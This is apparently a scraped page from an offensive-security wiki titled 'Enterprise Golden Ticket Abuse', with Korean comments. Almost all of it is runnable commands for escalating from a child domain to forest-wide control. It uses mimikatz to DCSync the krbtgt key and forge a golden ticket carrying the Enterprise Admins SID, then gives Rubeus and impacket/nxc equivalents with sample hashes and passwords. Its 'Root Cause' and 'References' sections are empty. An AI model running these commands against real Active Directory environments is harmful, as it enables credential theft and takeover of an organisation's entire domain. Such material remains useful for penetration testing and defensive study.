Enterprise Golden Ticket
Abuse
# 트러스트 도메인 FQDN 및 SID 수집
.\mimikatz.exe "lsadump::trust" "exit"
# 현재 도메인 krbtgt 비밀 키
.\mimikatz.exe "lsadump::dcsync /user:child\krbtgt /domain:child.contoso.com" "exit"
# 교차 도메인 DCSync
.\mimikatz.exe "kerberos::golden /user:Administrator /krbtgt:6709f2afdea5f9182231dcc25e8430e8 /domain:child.contoso.com /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519" "exit"
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
.\mimikatz.exe "lsadump::dcsync /domain:contoso.com /dc:ad01.contoso.com /user:contoso\Administrator" "exit"# 크로스 도메인 SID
(Get-ADDomain -Server 'contoso.com').DomainSID.Value
# 현재 도메인 SID
(Get-ADDomain).DomainSID.Value
# 도메인 골든 티켓 생성
.\Rubeus.exe golden /aes256:f34[...]9c4 /user:Administrator /id:500 /domain:child.contoso.com /sid:<Child Domain Sid> /sids:<Parent Domain Sid> /dc:contoso.com /nowrap# 크로스 도메인 SID
impacket-lookupsid child.contoso.com/child:'Password123!'@192.168.1.13
# 현재 도메인 SID
nxc ldap child.contoso.com -u Administrator -p 'Password123!' --get-sid
# 현재 도메인 krbtgt 비밀 키
impacket-secretsdump child/Administrator:'Password123!'@192.168.1.30 -just-dc
# 크로스 도메인 골든 티켓 생성
impacket-ticketer -nthash cf5982bea80660350f3cd30c83557ad8 -domain child.contoso.com -domain-sid <Child Domain Sid> -extra-sid <Parent Domain Sid - 519> AdministratorRoot Cause



References
Last updated

